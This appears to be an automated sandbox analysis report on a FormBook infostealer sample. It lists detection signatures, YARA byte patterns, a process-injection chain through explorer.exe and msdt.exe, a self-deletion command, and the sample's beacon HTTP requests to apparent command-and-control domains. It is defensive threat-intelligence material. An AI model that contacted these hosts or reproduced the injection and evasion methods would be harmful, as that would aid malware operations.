Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 86dXpRWnFG.exe

Overview

General Information

Sample Name:86dXpRWnFG.exe
Analysis ID:320986
MD5:221e46c09eb3440beb5a2256211c3262
SHA1:0f056342e6dffb5c4f3cdd1d7bd4ac5427175be0
SHA256:6ca1b2240b6d547ada7051dc4d0c198517436943ffd7a4d1eebc0bca19ac038a
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 86dXpRWnFG.exe (PID: 204 cmdline: 'C:\Users\user\Desktop\86dXpRWnFG.exe' MD5: 221E46C09EB3440BEB5A2256211C3262)
    • 86dXpRWnFG.exe (PID: 6820 cmdline: C:\Users\user\Desktop\86dXpRWnFG.exe MD5: 221E46C09EB3440BEB5A2256211C3262)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 4616 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 4808 cmdline: /c del 'C:\Users\user\Desktop\86dXpRWnFG.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.86dXpRWnFG.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.86dXpRWnFG.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.86dXpRWnFG.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        9.2.86dXpRWnFG.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          9.2.86dXpRWnFG.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: 86dXpRWnFG.exeVirustotal: Detection: 32%Perma Link
          Source: 86dXpRWnFG.exeReversingLabs: Detection: 10%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.785228330.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.914598348.0000000003820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.738669459.0000000003659000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.86dXpRWnFG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.86dXpRWnFG.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 86dXpRWnFG.exeJoe Sandbox ML: detected
          Source: 9.2.86dXpRWnFG.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 4x nop then pop edi9_2_0040E451
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi14_2_00F3E451

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49767
          Source: global trafficHTTP traffic detected: GET /ogg/?FdtP=yL0l42d8z4u&JfspOLvH=fOCM8bU6nldV/iwSncfaF5Bzy/lGPGgo/g5DGIZRlu3EMk3UROnm6TGL4YPAlMSLjacD HTTP/1.1Host: www.powderedsilk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogg/?JfspOLvH=+OCwvSqshndtikU4mojjB9YFTo9N+xlFipQY5pDaON76D3kf/3J7hGXS0Ci6kD/8+653&FdtP=yL0l42d8z4u HTTP/1.1Host: www.voetbalvandaag.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.0.217.44 52.0.217.44
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /ogg/?FdtP=yL0l42d8z4u&JfspOLvH=fOCM8bU6nldV/iwSncfaF5Bzy/lGPGgo/g5DGIZRlu3EMk3UROnm6TGL4YPAlMSLjacD HTTP/1.1Host: www.powderedsilk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ogg/?JfspOLvH=+OCwvSqshndtikU4mojjB9YFTo9N+xlFipQY5pDaON76D3kf/3J7hGXS0Ci6kD/8+653&FdtP=yL0l42d8z4u HTTP/1.1Host: www.voetbalvandaag.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: msdt.exe, 0000000E.00000002.917025969.0000000005D3F000.00000004.00000001.sdmpString found in binary or memory: <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#"> equals www.facebook.com (Facebook)
          Source: unknownDNS traffic detected: queries for: www.powderedsilk.com
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: msdt.exe, 0000000E.00000002.917025969.0000000005D3F000.00000004.00000001.sdmpString found in binary or memory: http://i.cdnpark.com/themes/registrar/791105.css
          Source: explorer.exe, 0000000A.00000002.915184347.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 86dXpRWnFG.exe, 00000000.00000002.737090679.0000000000D17000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comcomt_
          Source: 86dXpRWnFG.exe, 00000000.00000002.737090679.0000000000D17000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comldva
          Source: 86dXpRWnFG.exe, 00000000.00000002.737090679.0000000000D17000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.como
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 86dXpRWnFG.exe, 00000000.00000002.743106815.0000000005690000.00000002.00000001.sdmp, explorer.exe, 0000000A.00000000.764411646.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msdt.exe, 0000000E.00000002.917025969.0000000005D3F000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.785228330.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.914598348.0000000003820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.738669459.0000000003659000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.86dXpRWnFG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.86dXpRWnFG.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.785228330.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.785228330.00000000014F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.914598348.0000000003820000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.914598348.0000000003820000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.738669459.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.738669459.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.86dXpRWnFG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.86dXpRWnFG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.86dXpRWnFG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.86dXpRWnFG.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00419D60 NtCreateFile,9_2_00419D60
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00419E10 NtReadFile,9_2_00419E10
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00419E90 NtClose,9_2_00419E90
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00419F40 NtAllocateVirtualMemory,9_2_00419F40
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00419E0A NtReadFile,9_2_00419E0A
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00419E8F NtClose,9_2_00419E8F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389540 NtReadFile,LdrInitializeThunk,14_2_05389540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053895D0 NtClose,LdrInitializeThunk,14_2_053895D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389710 NtQueryInformationToken,LdrInitializeThunk,14_2_05389710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389780 NtMapViewOfSection,LdrInitializeThunk,14_2_05389780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389FE0 NtCreateMutant,LdrInitializeThunk,14_2_05389FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_05389660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389650 NtQueryValueKey,LdrInitializeThunk,14_2_05389650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053896E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_053896E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053896D0 NtCreateKey,LdrInitializeThunk,14_2_053896D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_05389910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053899A0 NtCreateSection,LdrInitializeThunk,14_2_053899A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389860 NtQuerySystemInformation,LdrInitializeThunk,14_2_05389860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389840 NtDelayExecution,LdrInitializeThunk,14_2_05389840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389A50 NtCreateFile,LdrInitializeThunk,14_2_05389A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0538AD30 NtSetContextThread,14_2_0538AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389520 NtWaitForSingleObject,14_2_05389520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389560 NtWriteFile,14_2_05389560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053895F0 NtQueryInformationFile,14_2_053895F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389730 NtQueryVirtualMemory,14_2_05389730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0538A710 NtOpenProcessToken,14_2_0538A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0538A770 NtOpenThread,14_2_0538A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389770 NtSetInformationFile,14_2_05389770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389760 NtOpenProcess,14_2_05389760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053897A0 NtUnmapViewOfSection,14_2_053897A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389610 NtEnumerateValueKey,14_2_05389610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389670 NtQueryInformationProcess,14_2_05389670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389950 NtQueueApcThread,14_2_05389950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053899D0 NtCreateProcessEx,14_2_053899D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389820 NtEnumerateKey,14_2_05389820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0538B040 NtSuspendThread,14_2_0538B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053898A0 NtWriteVirtualMemory,14_2_053898A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053898F0 NtReadVirtualMemory,14_2_053898F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389B00 NtSetValueKey,14_2_05389B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0538A3B0 NtGetContextThread,14_2_0538A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389A20 NtResumeThread,14_2_05389A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389A10 NtQuerySection,14_2_05389A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389A00 NtProtectVirtualMemory,14_2_05389A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05389A80 NtOpenDirectoryObject,14_2_05389A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F49D60 NtCreateFile,14_2_00F49D60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F49E90 NtClose,14_2_00F49E90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F49E10 NtReadFile,14_2_00F49E10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F49F40 NtAllocateVirtualMemory,14_2_00F49F40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F49E8F NtClose,14_2_00F49E8F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00F49E0A NtReadFile,14_2_00F49E0A
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 0_2_00225A630_2_00225A63
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 0_2_00AAC2B40_2_00AAC2B4
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 0_2_00AAE6080_2_00AAE608
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 0_2_00AAE6180_2_00AAE618
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_0041E87B9_2_0041E87B
